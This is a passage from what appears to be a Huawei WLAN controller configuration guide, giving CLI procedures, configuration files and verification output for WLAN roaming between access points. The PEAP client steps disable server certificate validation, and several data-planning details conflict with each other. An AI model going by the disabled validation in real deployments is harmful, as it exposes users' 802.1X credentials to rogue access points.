the coverage area of AP1. Use 802.1X authentication on the STA and enter the user name and
password. If the authentication succeeds, the STA can connect to the Internet. Configure the
STA according to the configured authentication mode PEAP.
l Configuration on the Windows XP operating system:
a. On the Association tab page of the Wireless network properties dialog box, add
SSID test, set the authentication mode to WPA2, encryption mode to CCMP, and
encryption algorithm to AES.
b. On the Authentication tab page, set EAP type to PEAP and click Properties. In
the Protected EAP Properties dialog box, deselect Validate server certificate and
click Configure. In the displayed dialog box, deselect Automatically use my
Windows logon name and password and click OK.
l Configuration on the Windows 7 operating system:
a. Access the Manage wireless networks page, click Add, and select Manually
create a network profile. Add SSID test. Set the authentication mode to WPA2-
Enterprise, the encryption mode to CCMP, and the algorithm to AES. Click Next.
b. Scan SSIDs and double-click SSID test. On the Security tab page, set EAP type to
PEAP and click Settings. In the displayed dialog box, deselect Validate server
certificate and click Configure. In the displayed dialog box, deselect
Automatically use my Windows logon name and password and click OK.
Assume that the STA MAC address is 0025-86aa-0d1c. When the STA connects to the
WLAN with the SSID test in the coverage area of AP1, run the display station assoc-info ap
1 command on the AC to check the STA access information.
<HUAWEI> display station assoc-info ap 1
------------------------------------------------------------------------------
STA MAC AP ID RADIO ID SS ID SSID
------------------------------------------------------------------------------
0025-86aa-0d1c 1 0 0 test
------------------------------------------------------------------------------
Total stations: 1

When the STA moves from the coverage of AP1 to AP2, run the display station assoc-info
ap 2 command on the AC to check the STA access information. The STA is associated with
AP2.
<HUAWEI> display station assoc-info ap 2
------------------------------------------------------------------------------
STA MAC AP ID RADIO ID SS ID SSID
------------------------------------------------------------------------------
0025-86aa-0d1c 2 0 1 test
------------------------------------------------------------------------------
Total stations: 1

Run the display station roam-track sta 0025-86aa-0d1c command on the AC to check the
STA roaming track.
<HUAWEI> display station roam-track sta 0025-86aa-0d1c
------------------------------------------------------------------------------
AP ID Radio ID BSSID TIME
------------------------------------------------------------------------------
1 0 60de-4476-e360 2012/12/23 14:40:37
2 0 dcd2-fc04-b500 2012/12/23 14:40:39
------------------------------------------------------------------------------
Number of roam track: 1

----End

Configuration Files
l Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 100
#
interface GigabitEthernet0/0/1
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100
#
interface GigabitEthernet0/0/2
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100
#
interface GigabitEthernet0/0/3
port link-type trunk
port trunk allow-pass vlan 100
#
return
l Configuration file of the AC
#
sysname AC
#
vlan batch 100 to 102
#
wlan ac-global carrier id other ac id 1
#
dhcp enable
#
radius-server template radius_huawei
radius-server shared-key cipher %#%#`z0u2h-7qBdp(x:|E]|#62(s!J~(}*DNPx<+Bbr!%#%
radius-server authentication 192.168.0.2 1812 weight 80
#
aaa
authentication-scheme radius_huawei
authentication-mode radius
domain huawei.com
authentication-scheme radius_huawei
radius-server radius_huawei
#
interface Vlanif100
ip address 192.168.10.1 255.255.255.0
dhcp select interface
#
interface Vlanif101
ip address 192.168.11.1 255.255.255.0
dhcp select interface
#
interface Vlanif102
ip address 192.168.0.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 100
#
interface GigabitEthernet1/0/3
port link-type trunk
port trunk allow-pass vlan 101
#
interface GigabitEthernet1/0/4
port link-type trunk
port trunk pvid vlan 102
port trunk allow-pass vlan 102
#
interface Wlan-Ess1
port trunk allow-pass vlan 101
authentication dot1x
dot1x authentication-method eap
permit-domain name huawei.com
domain name huawei.com force
#
wlan
wlan ac source interface vlanif100
ap-region id 10
ap id 1 type-id 19 mac 60de-4476-e360 sn 190901007618
region-id 10
ap id 2 type-id 19 mac dcd2-fc04-b500 sn 190901007619
region-id 10
wmm-profile name wmm id 1
traffic-profile name traffic id 1
security-profile name security id 1
security-policy wpa2
service-set name test id 1
forward-mode tunnel
wlan-ess 1
ssid test
traffic-profile id 1
security-profile id 1
service-vlan 101
radio-profile name radio id 1
channel-mode fixed
wmm-profile id 1
ap 1 radio 0
radio-profile id 1
service-set id 1 wlan 1
ap 2 radio 0
radio-profile id 1
channel 20MHz 6
service-set id 1 wlan 1
#
return

15.9.3 Example for Configuring Non-Fast Roaming Between APs in Different Service VLANs
Roaming Between APs in Different Service VLANs Overview
WLAN roaming allows a STA to move from the coverage area of an AP to that of another AP
with nonstop service transmission. In roaming between APs in different service VLANs, APs
before and after STA roaming belong to different service VLANs. To prevent services of a
user from being interrupted during WLAN roaming, ensure that the service VLAN of the user
remains unchanged after the user roams between two APs.
Roaming between APs in the same service VLAN is classified into fast roaming and non-fast
roaming. Non-fast roaming technology is used when a STA uses a non-WPA2-802.1x security
policy. If a STA uses WPA2-802.1x but does not support fast roaming, the STA still needs to
complete 802.1x authentication before roaming between two APs. When the user uses the
WPA2-802.1x security policy and supports fast roaming, the user does not need to perform
802.1x authentication again during roaming and only needs to perform key negotiation. In this
case, fast roaming reduces the roaming delay and improves the WLAN service experience.

Configuration Notes
l The APs on which WLAN roaming is implemented must use the same SSID and security
profiles, and the security profiles must have the same configurations.
l In direct forwarding mode, if the ARP entry of a user is not aged out in time on the
access device connected to the AP after the user roams, services of the user will be
temporarily interrupted. You are advised to enable STA address learning on the AC.
After the function is enabled, the AP will send a gratuitous ARP packet to the access
device so that the access device can update ARP entries in a timely manner. This ensures
nonstop service transmission during user roaming.
You can use either of the following methods to enable STA address learning according to
the version of your product:
– Versions earlier than V200R007C20 and V200R008: run the learn client ip-address enable command in the service set view.
– V200R007C20: run the undo learn-client-address disable command in the VAP profile view.
l If direct forwarding is used, configure port isolation on the interfaces that directly connect to APs. If port isolation is not configured, many broadcast packets will be transmitted in the VLANs, and WLAN users on different APs can communicate directly at Layer 2.
l How to configure the source interface:
– In V200R005 and V200R006, run the wlan ac source interface { loopback
loopback-number | vlanif vlan-id } command in the WLAN view.
– In V200R007 and V200R008, run the capwap source interface { loopback
loopback-number | vlanif vlan-id } command in the system view.
l No ACK mechanism is provided for multicast packet transmission on air interfaces. In
addition, wireless links are unstable. To ensure stable transmission of multicast packets,
they are usually sent at low rates. If a large number of such multicast packets are sent
from the network side, the air interfaces may be congested. You are advised to configure
multicast packet suppression to reduce impact of a large number of low-rate multicast
packets on the wireless network. Exercise caution when configuring the rate limit;
otherwise, the multicast services may be affected.
– In direct forwarding mode, you are advised to configure multicast packet
suppression on switch interfaces connected to APs.
– In tunnel forwarding mode, you are advised to configure multicast packet
suppression in traffic profiles of the AC.
For details on how to configure traffic suppression, see "How Do I Configure Multicast
Packet Suppression to Reduce Impact of a Large Number of Low-Rate Multicast Packets
on the Wireless Network?" in Configuration Guide — WLAN AC > WLAN QoS
Configuration.
l The following table lists applicable products and versions.

Table 15-27 Applicable products and versions

Software Version   Product Model   AP Model and Version
V200R005C00        S12700          V200R005C00: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN
V200R006C00        S12700          V200R005C00: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN
V200R007C00        S12700          V200R005C10: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN, AP8030DN, AP8130DN
                                   V200R005C20: AP7030DE, AP9330DN
V200R008C00        S12700          V200R005C10: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN, AP8030DN, AP8130DN
                                   V200R005C20: AP7030DE, AP9330DN
                                   V200R005C30: AP2030DN, AP4030DN, AP4130DN

Networking Requirements
As shown in Figure 15-12, two APs are deployed in a campus network to provide WLAN
services for employees of two departments, and are managed and controlled by an AC. The
AC dynamically assigns IP addresses to the APs and STAs. The employees of the two
departments belong to different VLANs, that is, AP1 belongs to VLAN101 and AP2 belongs
to VLAN102. The default security policy (WEP open system authentication) is used. User
data is forwarded through tunnels.
The department requires that services should not be interrupted when a STA moves from AP1
to AP2.

Figure 15-12 Networking diagram for configuring non-fast roaming between APs in different service VLANs

[Figure: the AC's GE1/0/3 (VLAN 101, VLAN 102) connects to the Internet; the AC's GE1/0/1 (VLAN 100) connects to SwitchA GE0/0/3 (VLAN 100); SwitchA GE0/0/1 and GE0/0/2 (VLAN 100) connect to AP1 and AP2. Both APs use SSID test, AP1 on channel 1 and AP2 on channel 6, and a STA roams between them. AP1: management VLAN 100, service VLAN 101, AP region ID 10. AP2: management VLAN 100, service VLAN 102, AP region ID 10.]
Data Planning

Table 15-28 Data planning

Item                                     Data                                                              Description
IP address of the AC's source interface  192.168.10.1/24                                                   None
WMM profile                              Name: wmm                                                         None
Radio profile                            Name: radio                                                       None
Security profile                         Name: security                                                    None
                                         Security and authentication policy: WPA2+PSK
                                         Authentication key: huawei123
                                         Encryption mode: CCMP
Traffic profile                          Name: traffic                                                     None
Service set                              Name: huawei-1                                                    None
                                         SSID: test
                                         WLAN virtual interface: WLAN-ESS 0
                                         Data forwarding mode: tunnel forwarding
                                         Name: huawei-2                                                    None
                                         SSID: test
                                         WLAN virtual interface: WLAN-ESS 1
                                         Data forwarding mode: tunnel forwarding
DHCP server                              The AC functions as the DHCP server to assign IP addresses to     None
                                         APs and STAs.
AP gateway and IP address pool range     VLANIF 100: 192.168.10.1/24, 192.168.10.2 to 192.168.10.254/24    None
STA gateway and IP address pool range    VLANIF 101: 192.168.11.1/24, 192.168.11.2 to 192.168.11.254/24    None
                                         VLANIF 102: 192.168.121.1/24, 192.168.12.2 to 192.168.12.254/24   None
Configuration Roadmap
The configuration roadmap is as follows:
1. The default security policy is used and access authentication is not required, which
shortens the roaming switchover time. Configure non-fast roaming between APs in
different service VLANs to ensure nonstop service transmission during roaming.
2. Configure parameters used for communication between the AC and APs to transmit
CAPWAP packets.
3. Configure the AC to function as a DHCP server to assign IP addresses to the STAs and
APs.
4. Configure basic WLAN services to enable the STAs to connect to the WLAN.

Procedure
Step 1 Set the NAC mode on AC to unified mode (default setting). Configure SwitchA and the AC
so that the APs and AC can transmit CAPWAP packets.
# Configure SwitchA: add interfaces GE0/0/1, GE0/0/2, and GE0/0/3 to management VLAN 100.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 100
[SwitchA] interface gigabitethernet 0/0/1
[SwitchA-GigabitEthernet0/0/1] port link-type trunk
[SwitchA-GigabitEthernet0/0/1] port trunk pvid vlan 100
[SwitchA-GigabitEthernet0/0/1] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet0/0/1] quit
[SwitchA] interface gigabitethernet 0/0/2
[SwitchA-GigabitEthernet0/0/2] port link-type trunk
[SwitchA-GigabitEthernet0/0/2] port trunk pvid vlan 100
[SwitchA-GigabitEthernet0/0/2] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet0/0/2] quit
[SwitchA] interface gigabitethernet 0/0/3
[SwitchA-gigabitethernet0/0/3] port link-type trunk
[SwitchA-gigabitethernet0/0/3] port trunk allow-pass vlan 100
[SwitchA-gigabitethernet0/0/3] quit

# Add GE1/0/1 that connects the AC to SwitchA to VLAN 100.
[HUAWEI] sysname AC
[AC] vlan batch 100
[AC] interface gigabitethernet 1/0/1
[AC-GigabitEthernet1/0/1] port link-type trunk
[AC-GigabitEthernet1/0/1] port trunk allow-pass vlan 100
[AC-GigabitEthernet1/0/1] quit

Step 2 Connect the AC to the upper-level network device.
# Add the AC uplink interface GE1/0/3 to VLAN101 and VLAN102.
[AC] vlan batch 101 102
[AC] interface gigabitethernet 1/0/3
[AC-GigabitEthernet1/0/3] port link-type trunk
[AC-GigabitEthernet1/0/3] port trunk allow-pass vlan 101 102
[AC-GigabitEthernet1/0/3] quit

Step 3 Configure the AC to function as a DHCP server to assign IP addresses to the STAs and APs.
# Configure the DHCP server based on the interface address pool. VLANIF100 provides IP
addresses for AP1 and AP2, VLANIF101 provides IP addresses for STAs connected to AP1,
and VLANIF102 provides IP addresses for STAs connected to AP2.
[AC] dhcp enable //Enable the DHCP function.
[AC] interface vlanif 100
[AC-Vlanif100] ip address 192.168.10.1 24
[AC-Vlanif100] dhcp select interface //Configure an interface-based address pool.
[AC-Vlanif100] quit
[AC] interface vlanif 101
[AC-Vlanif101] ip address 192.168.11.1 24
[AC-Vlanif101] dhcp select interface
[AC-Vlanif101] quit
[AC] interface vlanif 102
[AC-Vlanif102] ip address 192.168.12.1 24
[AC-Vlanif102] dhcp select interface
[AC-Vlanif102] quit

Step 4 Configure AC system parameters.

# Configure the country code.
[AC] wlan ac-global country-code cn
Warning: Modify the country code may delete configuration on those AP which use
the global country code and reset them, continue?[Y/N]:y

# Configure the AC ID and carrier ID.
[AC] wlan ac-global ac id 1 carrier id other //The default AC ID is 0. Set the AC ID to 1.

# Configure the source interface.
[AC] wlan
[AC-wlan-view] wlan ac source interface vlanif 100

Step 5 Manage APs on the AC.

# Check the AP type IDs after obtaining the MAC addresses of the APs.
[AC-wlan-view] display ap-type all
All AP types information:
------------------------------------------------------------------------------
ID Type
------------------------------------------------------------------------------
17 AP6010SN-GN
19 AP6010DN-AGN
21 AP6310SN-GN
23 AP6510DN-AGN
25 AP6610DN-AGN
27 AP7110SN-GN
28 AP7110DN-AGN
29 AP5010SN-GN
30 AP5010DN-AGN
31 AP3010DN-AGN
33 AP6510DN-AGN-US
34 AP6610DN-AGN-US
35 AP5030DN
36 AP5130DN
37 AP7030DE
38 AP2010DN
39 AP8130DN
40 AP8030DN
42 AP9330DN
43 AP4030DN
44 AP4130DN
45 AP3030DN
46 AP2030DN
------------------------------------------------------------------------------
Total number: 23

# Set the AP authentication mode to MAC address authentication (default setting). Add the
APs offline based on the AP type ID. Assume that the type of AP1 and AP2 is AP6010DN-
AGN, and their MAC addresses are 60de-4476-e360 and dcd2-fc04-b500 respectively.
[AC-wlan-view] ap id 1 type-id 19 mac 60de-4476-e360
[AC-wlan-ap-1] quit
[AC-wlan-view] ap id 2 type-id 19 mac dcd2-fc04-b500
[AC-wlan-ap-2] quit

# Configure an AP region and add the APs to the AP region.
[AC-wlan-view] ap-region id 10 //Create AP region 10
[AC-wlan-ap-region-10] quit
[AC-wlan-view] ap id 1
[AC-wlan-ap-1] region-id 10 //Add AP1 to region 10
[AC-wlan-ap-1] quit
[AC-wlan-view] ap id 2
[AC-wlan-ap-2] region-id 10 //Add AP2 to region 10
[AC-wlan-ap-2] quit

# After powering on AP1 and AP2, run the display ap all command on the AC to check the
AP running status. The command output shows that the AP status is normal.
[AC-wlan-view] display ap all
All AP information:
Normal[2],Fault[0],Commit-failed[0],Committing[0],Config[0],Download[0]
Config-failed[0],Standby[0],Type-not-match[0],Ver-mismatch[0]
------------------------------------------------------------------------------
AP ID   AP Type        AP MAC           Profile ID/Region ID   AP State   AP Sysname
------------------------------------------------------------------------------
1 AP6010DN-AGN 60de-4476-e360 0/10 normal ap-1
2 AP6010DN-AGN dcd2-fc04-b500 0/10 normal ap-2
------------------------------------------------------------------------------
Total number: 2,printed: 2

Step 6 Configure WLAN service parameters.
# Create a WMM profile named wmm and retain the default parameter settings.
[AC-wlan-view] wmm-profile name wmm id 1
[AC-wlan-wmm-prof-wmm] quit

# Create a radio profile named radio and bind the WMM profile wmm to the radio profile.
[AC-wlan-view] radio-profile name radio id 1
[AC-wlan-radio-prof-radio] channel-mode fixed
[AC-wlan-radio-prof-radio] wmm-profile name wmm
[AC-wlan-radio-prof-radio] quit
[AC-wlan-view] quit

# Create a WLAN-ESS interface. To implement roaming between APs in different service VLANs, configure two service VLANs (VLAN101 and VLAN102) on each WLAN-ESS interface.
[AC] interface wlan-ess 0
[AC-Wlan-Ess0] port trunk allow-pass vlan 101 102
[AC-Wlan-Ess0] quit
[AC] interface wlan-ess 1
[AC-Wlan-Ess1] port trunk allow-pass vlan 101 102
[AC-Wlan-Ess1] quit

# Create a security profile named security.
[AC] wlan
[AC-wlan-view] security-profile name security id 1
[AC-wlan-sec-prof-security] security-policy wpa2 //Configure security policy WPA2.
[AC-wlan-sec-prof-security] wpa2 authentication-method psk pass-phrase cipher huawei123 encryption-method ccmp //Set the encryption method to PSK+CCMP.
[AC-wlan-sec-prof-security] quit

# Create a traffic profile named traffic and retain the default parameter settings.
[AC-wlan-view] traffic-profile name traffic id 1
[AC-wlan-traffic-prof-traffic] quit

# Configure service sets for AP1 and AP2, and set the data forwarding mode to tunnel forwarding.
[AC-wlan-view] service-set name huawei-1
[AC-wlan-service-set-huawei-1] ssid test
[AC-wlan-service-set-huawei-1] wlan-ess 0
[AC-wlan-service-set-huawei-1] service-vlan 101
[AC-wlan-service-set-huawei-1] security-profile name security
[AC-wlan-service-set-huawei-1] traffic-profile name traffic
[AC-wlan-service-set-huawei-1] forward-mode tunnel
[AC-wlan-service-set-huawei-1] quit
[AC-wlan-view] service-set name huawei-2
[AC-wlan-service-set-huawei-2] ssid test
[AC-wlan-service-set-huawei-2] wlan-ess 1
[AC-wlan-service-set-huawei-2] service-vlan 102
[AC-wlan-service-set-huawei-2] security-profile name security
[AC-wlan-service-set-huawei-2] traffic-profile name traffic
[AC-wlan-service-set-huawei-2] forward-mode tunnel
[AC-wlan-service-set-huawei-2] quit

# Configure a VAP.
[AC-wlan-view] ap 1 radio 0
[AC-wlan-radio-1/0] radio-profile name radio
[AC-wlan-radio-1/0] channel 20mhz 1
[AC-wlan-radio-1/0] service-set name huawei-1
[AC-wlan-radio-1/0] quit
[AC-wlan-view] ap 2 radio 0
[AC-wlan-radio-2/0] radio-profile name radio
[AC-wlan-radio-2/0] channel 20mhz 6
[AC-wlan-radio-2/0] service-set name huawei-2
[AC-wlan-radio-2/0] quit

# Commit the configuration.
[AC-wlan-view] commit ap 1
Warning: Committing configuration may cause service interruption, continue?[Y/N]
:y
[AC-wlan-view] commit ap 2
Warning: Committing configuration may cause service interruption, continue?[Y/N]
:y

Step 7 Verify the configuration.

After the configuration is complete, the STA can connect to the WLAN with the SSID test in
the coverage area of AP1.

Assume that the STA MAC address is 0025-86aa-0d1c. When the STA connects to the
WLAN with the SSID test in the coverage area of AP1, run the display station assoc-info ap
1 command on the AC to check the STA access information.
<HUAWEI> display station assoc-info ap 1
------------------------------------------------------------------------------
STA MAC AP ID RADIO ID SS ID SSID
------------------------------------------------------------------------------
0025-86aa-0d1c 1 0 0 test
------------------------------------------------------------------------------
Total stations: 1

When the STA moves from the coverage of AP1 to AP2, run the display station assoc-info
ap 2 command on the AC to check the STA access information. The STA is associated with
AP2.
<HUAWEI> display station assoc-info ap 2
------------------------------------------------------------------------------
STA MAC AP ID RADIO ID SS ID SSID
------------------------------------------------------------------------------
0025-86aa-0d1c 2 0 1 test
------------------------------------------------------------------------------
Total stations: 1

Run the display station roam-track sta 0025-86aa-0d1c command on the AC to check the
STA roaming track.
<HUAWEI> display station roam-track sta 0025-86aa-0d1c
------------------------------------------------------------------------------
AP ID Radio ID BSSID TIME
------------------------------------------------------------------------------
1 0 60de-4476-e360 2012/12/23 14:40:37
2 0 dcd2-fc04-b500 2012/12/23 14:40:39


------------------------------------------------------------------------------
Number of roam track: 1

----End

Configuration Files
l Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 100
#
interface GigabitEthernet0/0/1
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100
#
interface GigabitEthernet0/0/2
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100
#
interface GigabitEthernet0/0/3
port link-type trunk
port trunk allow-pass vlan 100
#
return

l Configuration file of the AC


#
sysname AC
#
vlan batch 100 to 102
#
wlan ac-global carrier id other ac id 1
#
dhcp enable
#
interface Vlanif100
ip address 192.168.10.1 255.255.255.0
dhcp select interface
#
interface Vlanif101
ip address 192.168.11.1 255.255.255.0
dhcp select interface
#
interface Vlanif102
ip address 192.168.12.1 255.255.255.0
dhcp select interface
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100
#
interface GigabitEthernet1/0/3
port link-type trunk
port trunk allow-pass vlan 101 to 102
#
interface Wlan-Ess0
port trunk allow-pass vlan 101 to 102
#


interface Wlan-Ess1
port trunk allow-pass vlan 101 to 102
#
wlan
wlan ac source interface vlanif100
ap-region id 10
ap id 1 type-id 19 mac 60de-4476-e360 sn 190901007618
region-id 10
ap id 2 type-id 19 mac dcd2-fc04-b500 sn 190901007619
region-id 10
wmm-profile name wmm id 1
traffic-profile name traffic id 1
security-profile name security id 1
security-policy wpa2
wpa2 authentication-method psk pass-phrase cipher %@%@}PSoXN{buC{{i+L![@/I<|C"%@%@ encryption-method ccmp
service-set name huawei-1 id 0
forward-mode tunnel
wlan-ess 0
ssid test
traffic-profile id 1
security-profile id 1
service-vlan 101
service-set name huawei-2 id 1
forward-mode tunnel
wlan-ess 1
ssid test
traffic-profile id 1
security-profile id 1
service-vlan 102
radio-profile name radio id 1
channel-mode fixed
wmm-profile id 1
ap 1 radio 0
radio-profile id 1
service-set id 0 wlan 1
ap 2 radio 0
radio-profile id 1
channel 20MHz 6
service-set id 1 wlan 2
#
return

15.9.4 Example for Configuring Fast Roaming Between APs in Different Service VLANs
Roaming Between APs in Different Service VLANs Overview
WLAN roaming allows a STA to move from the coverage area of an AP to that of another AP
with nonstop service transmission. In roaming between APs in different service VLANs, APs
before and after STA roaming belong to different service VLANs. To prevent services of a
user from being interrupted during WLAN roaming, ensure that the service VLAN of the user
remains unchanged after the user roams between two APs.
Roaming between APs in the same service VLAN is classified into fast roaming and non-fast
roaming. Non-fast roaming technology is used when a STA uses a non-WPA2-802.1x security
policy. If a STA uses WPA2-802.1x but does not support fast roaming, the STA still needs to
complete 802.1x authentication before roaming between two APs. When the user uses the
WPA2-802.1x security policy and supports fast roaming, the user does not need to perform
802.1x authentication again during roaming and only needs to perform key negotiation. In this
case, fast roaming reduces the roaming delay and improves the WLAN service experience.


Configuration Notes
l The APs on which WLAN roaming is implemented must use the same SSID and security
profiles, and the security profiles must have the same configurations.
l In direct forwarding mode, if the ARP entry of a user is not aged out in time on the
access device connected to the AP after the user roams, services of the user will be
temporarily interrupted. You are advised to enable STA address learning on the AC.
After the function is enabled, the AP will send a gratuitous ARP packet to the access
device so that the access device can update ARP entries in a timely manner. This ensures
nonstop service transmission during user roaming.
You can use either of the following methods to enable STA address learning according to
the version of your product:
– Versions earlier than V200R007C20 and V200R008: run the learn client ip-
address enable command in the service set view.
– V200R007C20: run the undo learn-client-address disable command in the VAP
profile view.
l If direct forwarding is used, configure port isolation on the interfaces that directly connect to
APs. If port isolation is not configured, a large number of broadcast packets will be transmitted in the
VLANs, and WLAN users on different APs will be able to communicate directly at Layer 2.
l How to configure the source interface:
– In V200R005 and V200R006, run the wlan ac source interface { loopback
loopback-number | vlanif vlan-id } command in the WLAN view.
– In V200R007 and V200R008, run the capwap source interface { loopback
loopback-number | vlanif vlan-id } command in the system view.
l No ACK mechanism is provided for multicast packet transmission on air interfaces. In
addition, wireless links are unstable. To ensure stable transmission of multicast packets,
they are usually sent at low rates. If a large number of such multicast packets are sent
from the network side, the air interfaces may be congested. You are advised to configure
multicast packet suppression to reduce impact of a large number of low-rate multicast
packets on the wireless network. Exercise caution when configuring the rate limit;
otherwise, the multicast services may be affected.
– In direct forwarding mode, you are advised to configure multicast packet
suppression on switch interfaces connected to APs.
– In tunnel forwarding mode, you are advised to configure multicast packet
suppression in traffic profiles of the AC.
For details on how to configure traffic suppression, see "How Do I Configure Multicast
Packet Suppression to Reduce Impact of a Large Number of Low-Rate Multicast Packets
on the Wireless Network?" in Configuration Guide — WLAN AC > WLAN QoS
Configuration.
l The following table lists applicable products and versions.


Table 15-29 Applicable products and versions

Software Version | Product Model | AP Model and Version
V200R005C00 | S12700 | V200R005C00: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN
V200R006C00 | S12700 | V200R005C00: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN
V200R007C00 | S12700 | V200R005C10: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN, AP8030DN, AP8130DN; V200R005C20: AP7030DE, AP9330DN
V200R008C00 | S12700 | V200R005C10: AP2010DN, AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN, AP8030DN, AP8130DN; V200R005C20: AP7030DE, AP9330DN; V200R005C30: AP2030DN, AP4030DN, AP4130DN

Networking Requirements
As shown in Figure 15-13, two APs are deployed in a campus network to provide WLAN
services for employees of two departments, and are managed and controlled by an AC. The
AC dynamically assigns IP addresses to the APs and STAs. The employees of the two
departments belong to different VLANs, that is, AP1 belongs to VLAN101 and AP2 belongs
to VLAN102. The security policy WPA2-802.1X is used. User data is forwarded through
tunnels.


The department requires that services should not be interrupted when a STA moves from AP1
to AP2.

Figure 15-13 Networking diagram for configuring fast roaming between APs in different service VLANs

[Figure not reproduced. Labels recoverable from the diagram: Internet; RADIUS server 192.168.0.2/24; AC with uplink GE1/0/3 (VLAN 101, VLAN 102), GE1/0/4 to the RADIUS server, and GE1/0/1 (VLAN 100) to SwitchA; SwitchA with GE0/0/3 (VLAN 100) to the AC and GE0/0/1, GE0/0/2 (VLAN 100) to AP1 and AP2; AP1 (SSID: test, channel 1) and AP2 (SSID: test, channel 6) with a STA roaming between them; AP1: management VLAN 100, service VLAN 101, AP region ID 10; AP2: management VLAN 100, service VLAN 102, AP region ID 10.]

Data Planning

Table 15-30 Data planning

Item | Data | Description
IP address of the AC's source interface | 192.168.10.1/24 | None
WMM profile | Name: wmm | None
Radio profile | Name: radio | None
Security profile | Name: security; Security and authentication policy: WPA2+802.1X; Authentication key: hello; Encryption mode: CCMP | None
Traffic profile | Name: traffic | None
Service set | Name: huawei-1; SSID: test; WLAN virtual interface: WLAN-ESS 0; Data forwarding mode: tunnel forwarding | None
Service set | Name: huawei-2; SSID: test; WLAN virtual interface: WLAN-ESS 1; Data forwarding mode: tunnel forwarding | None
DHCP server | The AC functions as the DHCP server to assign IP addresses to APs and STAs. | None
AP gateway and IP address pool range | VLANIF 100: 192.168.10.1/24, 192.168.10.2 to 192.168.10.254/24 | None
STA gateway and IP address pool range | VLANIF 101: 192.168.11.1/24, 192.168.11.2 to 192.168.11.254/24 | None
STA gateway and IP address pool range | VLANIF 102: 192.168.12.1/24, 192.168.12.2 to 192.168.12.254/24 | None

Configuration Roadmap
The configuration roadmap is as follows:
1. The security policy WPA2-802.1X is used and access authentication is required, which
results in longer roaming switchover time. Configure fast roaming between APs in the
same service VLAN to ensure nonstop service transmission during roaming.
2. Configure parameters used for communication between the AC and APs to transmit
CAPWAP packets.
3. Configure the AC as a DHCP server to assign IP addresses to the STAs and APs.
4. Configure basic WLAN services to enable the STAs to connect to the WLAN.
5. Configure key negotiation between STAs and APs to shorten the roaming switchover
time.


Procedure
Step 1 Set the NAC mode on AC to unified mode (default setting). Configure SwitchA and the AC
so that the APs and AC can transmit CAPWAP packets.
# Configure SwitchA: add interfaces GE0/0/1, GE0/0/2, and GE0/0/3 to management VLAN 100.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 100
[SwitchA] interface gigabitethernet 0/0/1
[SwitchA-GigabitEthernet0/0/1] port link-type trunk
[SwitchA-GigabitEthernet0/0/1] port trunk pvid vlan 100
[SwitchA-GigabitEthernet0/0/1] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet0/0/1] quit
[SwitchA] interface gigabitethernet 0/0/2
[SwitchA-GigabitEthernet0/0/2] port link-type trunk
[SwitchA-GigabitEthernet0/0/2] port trunk pvid vlan 100
[SwitchA-GigabitEthernet0/0/2] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet0/0/2] quit
[SwitchA] interface gigabitethernet 0/0/3
[SwitchA-gigabitethernet0/0/3] port link-type trunk
[SwitchA-gigabitethernet0/0/3] port trunk allow-pass vlan 100
[SwitchA-gigabitethernet0/0/3] quit

# Add GE1/0/1 that connects the AC to SwitchA to VLAN 100.


[HUAWEI] sysname AC
[AC] vlan batch 100
[AC] interface gigabitethernet 1/0/1
[AC-GigabitEthernet1/0/1] port link-type trunk
[AC-GigabitEthernet1/0/1] port trunk allow-pass vlan 100
[AC-GigabitEthernet1/0/1] quit

Step 2 Connect the AC to the upper-level network device.


# Add the AC uplink interface GE1/0/3 to VLAN 101 and VLAN 102, and add GE1/0/4 of
the AC connecting to the RADIUS server to VLAN 103.
[AC] vlan batch 101 to 103
[AC] interface gigabitethernet 1/0/3
